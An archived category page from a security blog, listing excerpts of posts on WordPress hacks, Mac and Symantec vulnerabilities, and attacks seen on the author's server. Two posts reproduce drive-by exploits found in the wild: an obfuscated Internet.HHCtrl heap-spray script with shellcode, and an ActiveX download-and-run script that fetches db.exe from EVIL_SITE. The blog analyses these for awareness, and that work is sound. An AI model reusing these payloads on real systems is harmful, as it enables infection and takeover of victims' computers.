You are viewing a read-only archive of the Blogs.Harvard network. Learn more.
Skip to content

Category Archives: Vulnerabilities

buffers and the people who overflow them

WordPress 2.5.0 and 2.5.1 vulnerable to attack

Sunday, June 8, 2008

Thanks to co-author Brandon Palmen for the heads up to a WordPress hack in progress. The attackers are using a few obfuscation tricks to inject code into WordPress installations using a recently announced vulnerability. More details in a well written write up here. The code snippets from a digitalpoint.com forum are shown using base64 encoding […]

Also filed in Digital Warfare | | Comments Off on WordPress 2.5.0 and 2.5.1 vulnerable to attack

Top 2007 Symantec Vulnerabilities

Wednesday, January 2, 2008

MAY 25, 2006 | EEye Digital Security revealed this afternoon a software vulnerability inside Symantec’s Anti-Virus Corporate Edition 10.0. The vulnerability warning, posted on the vendor’s Upcoming Advisories page, requires no user intervention and could be used to create a worm. A Symantec representative told Dark Reading that eEye notified Symantec of the problem today […]

Also filed in Digital Warfare | | Comments Off on Top 2007 Symantec Vulnerabilities

Great Reading List on Web Exploits

Wednesday, May 9, 2007

I was reading up on inet-lux and found a great blog post in spanish which provides a must read references list. I ended up here reading about a java based botnet tool I found while researching appeals today. I hope to have more on that later but have not had time to decompile it. Anyone […]

Also filed in spyware | | Comments Off on Great Reading List on Web Exploits

Internet.HHCtrl.1 Exploit

Sunday, December 24, 2006

I’ve enclosed the code in a text box to make reading it a little easier. This code was found on a live site that is using the exploit via iframes to infect drive by downloaders. Extra br tags are a result of the blog software…. <script> t=”60,83,67,82,73,80,84,32,108,97,110,103,117,97,103,101,61,74,97,118,97,83,99,114,105,112,116,62,104,72,72,67,116,114,108,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,73,110,116,101,114,110,101,116,46,72,72,67,116,114,108,46,49,34,41,59,13,10,118,97,114,32,101,118,105,108,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,48,48,48,98,37,117,48,48,48,98,37,117,48,48,48,98,37,117,48,48,48,98,34,41,59,13,10,118,97,114,32,73,109,97,103,101,115,32,61,32,34,65,99,116,105,118,101,88,46,34,32,43,32,101,118,105,108,32,43,32,34,82,116,108,65,108,108,111,99,97,116,101,72,101,97,112,82,116,108,67,114,101,97,116,101,72,101,97,112,34,59,13,10,118,97,114,32,99,111,117,110,116,32,61,32,48,59,118,97,114,32,109,97,120,99,111,117,110,116,32,61,32,49,48,59,102,117,110,99,116,105,111,110,32,67,108,105,99,107,84,111,40,41,123,32,104,72,72,67,116,114,108,46,73,109,97,103,101,32,61,32,73,109,97,103,101,115,59,125,13,10,102,117,110,99,116,105,111,110,32,71,111,116,73,116,40,41,123,32,99,111,117,110,116,43,43,59,32,105,102,40,99,111,117,110,116,32,60,32,109,97,120,99,111,117,110,116,41,32,123,32,32,120,46,111,110,99,108,105,99,107,40,41,59,32,32,71,111,116,73,116,40,41,59,32,125,125,13,10,102,117,110,99,116,105,111,110,32,66,117,105,108,100,67,111,110,116,101,120,116,40,41,123,32,112,97,121,108,111,97,100,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,37,117,54,48,57,48,37,117,49,55,101,98,37,117,54,52,53,101,37,117,51,48,97,49,37,117,48,48,48,48,37,117,48,53,48,48,37,117,48,56,48,48,37,117,48,48,48,48,37,117,102,56,56,98,37,117,48,48,98,57,37,117,48,48,48,52,37,117,102,51,48,48,37,117,102,102,97,52,37,117,101,56,101,48,37,117,102,102,101,52,37,117,102,102,102,102,37,117,97,49,54,52,37,117,48,48,51,48,37,117,48,48,48,48,37,117,52,48,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,117,56,98,97,100,37,117,48,56,55,48,37,117,101,99,56,49,37,117,48,50,48,48,37,117,48,48,48,48,37,117,101,99,56,98,37,117,101,56,98,98,37,117,48,50,48,102,37,117,56,98,48,48,37,117,56,53,48,51,37,117,48,102,99,48,37,117,98,98,56,53,37,117,48,48,48,48,37,117,102,102,48,48,37,117,101,57,48,51,37,117,48,50,50,49,37,117,48,48,48,48,37,117,56,57,53,98,37,117,50,48,53,100,37,117,54,56,53,54,37,117,102,101,57,56,37,117,48,101,56,97,37,117,98,49,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,48,99,52,53,37,117,54,56,53,54,37,117,52,101,56,101,37,117,101,99,48,101,37,117,97,51,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,48,52,52,53,37,117,54,56,53,54,37,117,55,57,99,49,37,117,98,56,101,53,37,117,57,53,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,99,52,53,37,117,54,56,53,54,37,117,99,54,49,98,37,117,55,57,52,54,37,117,56,55,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,48,52,53,37,117,54,56,53,54,37,117,102,99,97,97,37,117,55,99,48,100,37,117,55,57,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,48,56,52,53,37,117,54,56,53,54,37,117,56,52,101,55,37,117,98,52,54,57,37,117,54,98,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,52,52,53,37,117,101,48,98,98,37,117,48,50,48,102,37,117,56,57,48,48,37,117,51,51,48,51,37,117,99,55,102,54,37,117,50,56,52,53,37,117,53,50,53,53,37,117,52,100,52,99,37,117,52,53,99,55,37,117,52,102,50,99,37,117,48,48,52,101,37,117,56,100,48,48,37,117,50,56,53,100,37,117,102,102,53,51,37,117,48,52,53,53,37,117,54,56,53,48,37,117,49,97,51,54,37,117,55,48,50,102,37,117,51,102,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,50,52,52,53,37,117,55,102,54,97,37,117,53,100,56,100,37,117,53,51,50,56,37,117,53,53,102,102,37,117,99,55,49,99,37,117,48,53,52,52,37,117,53,99,50,56,37,117,54,53,50,101,37,117,99,55,55,56,37,117,48,53,52,52,37,117,54,53,50,99,37,117,48,48,48,48,37,117,53,54,48,48,37,117,56,100,53,54,37,117,50,56,55,100,37,117,102,102,53,55,37,117,50,48,55,53,37,117,102,102,53,54,37,117,50,52,53,53,37,117,53,55,53,54,37,117,53,53,102,102,37,117,101,56,48,99,37,117,48,48,54,50,37,117,48,48,48,48,37,117,99,52,56,49,37,117,48,50,48,48,37,117,48,48,48,48,37,117,51,51,54,49,37,117,99,50,99,48,37,117,48,48,48,52,37,117,56,98,53,53,37,117,53,49,101,99,37,117,56,98,53,51,37,117,48,56,55,100,37,117,53,100,56,98,37,117,53,54,48,99,37,117,55,51,56,98,37,117,56,98,51,99,37,117,49,101,55,52,37,117,48,51,55,56,37,117,53,54,102,51,37,117,55,54,56,98,37,117,48,51,50,48,37,117,51,51,102,51,37,117,52,57,99,57,37,117,97,100,52,49,37,117,99,51,48,51,37,117,51,51,53,54,37,117,48,102,102,54,37,117,49,48,98,101,37,117,102,50,51,97,37,117,48,56,55,52,37,117,99,101,99,49,37,117,48,51,48,100,37,117,52,48,102,50,37,117,102,49,101,98,37,117,102,101,51,98,37,117,55,53,53,101,37,117,53,97,101,53,37,117,101,98,56,98,37,117,53,97,56,98,37,117,48,51,50,52,37,117,54,54,100,100,37,117,48,99,56,98,37,117,56,98,52,98,37,117,49,99,53,97,37,117,100,100,48,51,37,117,48,52,56,98,37,117,48,51,56,98,37,117,53,101,99,53,37,117,53,57,53,98,37,117,99,50,53,100,37,117,48,48,48,56,37,117,57,50,101,57,37,117,48,48,48,48,37,117,53,101,48,48,37,117,56,48,98,102,37,117,48,50,48,99,37,117,98,57,48,48,37,117,48,49,48,48,37,117,48,48,48,48,37,117,97,52,102,51,37,117,101,99,56,49,37,117,48,49,48,48,37,117,48,48,48,48,37,117,102,99,56,98,37,117,99,55,56,51,37,117,99,55,49,48,37,117,54,101,48,55,37,117,54,52,55,52,37,117,99,55,54,99,37,117,48,52,52,55,37,117,48,48,54,99,37,117,48,48,48,48,37,117,102,102,53,55,37,117,48,52,53,53,37,117,52,53,56,57,37,117,99,55,50,52,37,117,53,50,48,55,37,117,54,99,55,52,37,117,99,55,52,49,37,117,48,52,52,55,37,117,54,99,54,99,37,117,54,51,54,102,37,117,52,55,99,55,37,117,54,49,48,56,37,117,54,53,55,52,37,117,99,55,52,56,37,117,48,99,52,55,37,117,54,49,54,53,37,117,48,48,55,48,37,117,53,48,53,55,37,117,53,53,102,102,37,117,56,98,48,56,37,117,98,56,102,48,37,117,48,102,101,52,37,117,48,48,48,50,37,117,51,48,56,57,37,117,48,55,99,55,37,117,55,51,54,100,37,117,54,51,55,54,37,117,52,55,99,55,37,117,55,50,48,52,37,117,48,48,55,52,37,117,53,55,48,48,37,117,53,53,102,102,37,117,56,98,48,52,37,117,51,99,52,56,37,117,56,99,56,98,37,117,56,48,48,56,37,117,48,48,48,48,37,117,51,57,48,48,37,117,48,56,51,52,37,117,48,52,55,52,37,117,102,57,101,50,37,117,49,50,101,98,37,117,51,52,56,100,37,117,53,53,48,56,37,117,52,48,54,97,37,117,48,52,54,97,37,117,102,102,53,54,37,117,49,48,53,53,37,117,48,54,99,55,37,117,48,99,56,48,37,117,48,48,48,50,37,117,99,52,56,49,37,117,48,49,48,48,37,117,48,48,48,48,37,117,101,56,99,51,37,117,102,102,54,57,37,117,102,102,102,102,37,117,48,52,56,98,37,117,53,51,50,52,37,117,53,50,53,49,37,117,53,55,53,54,37,117,101,99,98,57,37,117,48,50,48,102,37,117,56,98,48,48,37,117,56,53,49,57,37,117,55,53,100,98,37,117,51,51,53,48,37,117,51,51,99,57,37,117,56,51,100,98,37,117,48,54,101,56,37,117,98,55,48,102,37,117,56,49,49,56,37,117,102,102,102,98,37,117,48,48,49,53,37,117,55,53,48,48,37,117,56,51,51,101,37,117,48,54,101,56,37,117,98,55,48,102,37,117,56,49,49,56,37,117,102,102,102,98,37,117,48,48,51,53,37,117,55,53,48,48,37,117,56,51,51,48,37,117,48,50,101,56,37,117,98,55,48,102,37,117,56,51,49,56,37,117,54,97,102,98,37,117,50,53,55,53,37,117,99,48,56,51,37,117,56,98,48,52,37,117,98,56,51,48,37,117,48,102,101,48,37,117,48,48,48,50,37,117,48,48,54,56,37,117,48,48,48,48,37,117,54,56,48,49,37,117,49,48,48,48,37,117,48,48,48,48,37,117,48,48,54,97,37,117,49,48,102,102,37,117,48,54,56,57,37,117,52,52,56,57,37,117,49,56,50,52,37,117,101,99,98,57,37,117,48,50,48,102,37,117,102,102,48,48,37,117,53,102,48,49,37,117,53,97,53,101,37,117,53,98,53,57,37,117,101,52,98,56,37,117,48,50,48,102,37,117,102,102,48,48,37,117,101,56,50,48,37,117,102,100,100,97,37,117,102,102,102,102,34,41,59,13,10,104,111,109,101,61,117,110,101,115,99,97,112,101,40,34,37,117,55,52,54,56,37,117,55,48,55,52,37,117,50,102,51,97,37,117,54,51,50,102,37,117,54,49,54,57,37,117,54,54,50,101,37,117,54,57,54,50,37,117,54,102,50,101,37,117,54,55,55,50,37,117,54,51,50,101,37,117,50,102,54,101,37,117,55,51,54,51,37,117,50,101,54,101,37,117,55,56,54,53,37,117,48,48,54,53,37,117,48,48,48,48,34,41,59,13,10,114,117,110,110,97,98,108,101,32,61,32,112,97,121,108,111,97,100,43,104,111,109,101,59,32,115,107,105,112,112,101,114,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,52,56,52,56,37,117,52,56,52,56,34,41,59,13,10,119,104,105,108,101,32,40,115,107,105,112,112,101,114,46,108,101,110,103,116,104,60,50,48,43,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,32,123,32,32,115,107,105,112,112,101,114,43,61,115,107,105,112,112,101,114,59,32,125,13,10,115,107,105,112,112,101,114,49,32,61,32,115,107,105,112,112,101,114,46,115,117,98,115,116,114,105,110,103,40,48,44,32,50,48,43,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,59,13,10,115,107,105,112,112,101,114,50,32,61,32,115,107,105,112,112,101,114,46,115,117,98,115,116,114,105,110,103,40,48,44,32,115,107,105,112,112,101,114,46,108,101,110,103,116,104,45,50,48,45,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,59,13,10,119,104,105,108,101,40,115,107,105,112,112,101,114,50,46,108,101,110,103,116,104,60,40,48,120,52,48,48,48,48,45,50,48,45,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,41,32,123,32,32,115,107,105,112,112,101,114,50,32,43,61,32,115,107,105,112,112,101,114,50,59,13,10,115,107,105,112,112,101,114,50,32,43,61,32,115,107,105,112,112,101,114,49,59,32,125,32,99,111,110,116,101,120,116,32,61,32,110,101,119,32,65,114,114,97,121,40,41,59,32,105,105,61,45,49,59,32,119,104,105,108,101,40,43,43,105,105,60,51,48,48,41,13,10,123,32,32,99,111,110,116,101,120,116,91,105,105,93,32,61,32,115,107,105,112,112,101,114,50,32,43,32,114,117,110,110,97,98,108,101,59,32,125,32,71,111,116,73,116,40,41,59,125,102,117,110,99,116,105,111,110,32,116,101,115,116,40,41,123,32,97,108,101,114,116,40,41,59,125,60,47,83,67,82,73,80,84,62″ t=eval(“String.fromCharCode(“+t+”)”); document.write(t); </script> </HEAD><BODY onload=BuildContext();> <BUTTON id=x onclick=ClickTo();> […]

Also filed in Digital Warfare | | Comments Off on Internet.HHCtrl.1 Exploit

another variation of drive by downloaders

Sunday, December 24, 2006

The exploit used is fairly old. One other important thing to note is that the CLSID used here is a Microsoft database control. [zero@day testing]$ curl http://EVIL_SITE/db/wm.htm <script> var url,path; url=”http://EVIL_SITE/mc/game/db.exe”; path=”C:\\boot.exe”; try{ var ado=(document.createElement(“object”)); var d=1; ado.setAttribute(“classid”,”clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″); var e=1; var xml=ado.CreateObject(“Microsoft.XMLHTTP”,””); var f=1; var ab=”Adodb.”; var cd=”Stream”; var g=1; var as=ado.createobject(ab+cd,””); var h=1; xml.Open(“GET”,url,0); […]

Also filed in Digital Warfare | | Comments Off on another variation of drive by downloaders

Hi, I’m a Mac

Friday, September 1, 2006

And I can get 0wned just like you PC. * ImageIO CVE-ID: CVE-2006-3459, CVE-2006-3461, CVE-2006-3462, CVE-2006-3465 Available for: Mac OS X v10.4.7 Build 8K1079, Mac OS X Server v10.4.7 Build 8K1079 Impact: Viewing a maliciously-crafted TIFF image may lead to an application crash or arbitrary code execution Description: Buffer overflows were discovered in TIFF tag […]

Also filed in zeroday | | Comments Off on Hi, I’m a Mac

More attacks on my web server [Elf Kaiten.AQ]

Monday, June 5, 2006

the same as the last one which was based on Mambo (open source CMS). This time I was able to pull the files down in time. EDIT: More information here documented by enkrypted UPDATE: Secunia reports this as Elf Kaiten.AQ TrendMicro reports the trojan but the statistics are horribly wrong. Just the channel I’m monitoring […]

Also filed in Digital Warfare, zeroday | | Comments Off on More attacks on my web server [Elf Kaiten.AQ]

Interesting attacks on my web server

Friday, May 5, 2006

Still think that firewall is enough to protect your web server? Port 80 to the rescue! Through a combination of curl, wget and various shell commands this “URL” is a sneaky little rootkit. I haven’t had time to download the executables and rip them apart but something tells me that after all is said and […]

Also filed in | | Comments Off on Interesting attacks on my web server

Latest on OS X research

Monday, May 1, 2006

Tom Ferris, noted security researcher, has listed a series of new bugs to come out for OS X. it’s an interesting mixture of bugs which consists of mostly Heap Overflows. This is scary for those who would like to think that their OS X machine is 100% safe from malware. The media doesn’t always help […]

Also filed in | | Comments Off on Latest on OS X research
Proudly powered by WordPress. Hosted by Pressable.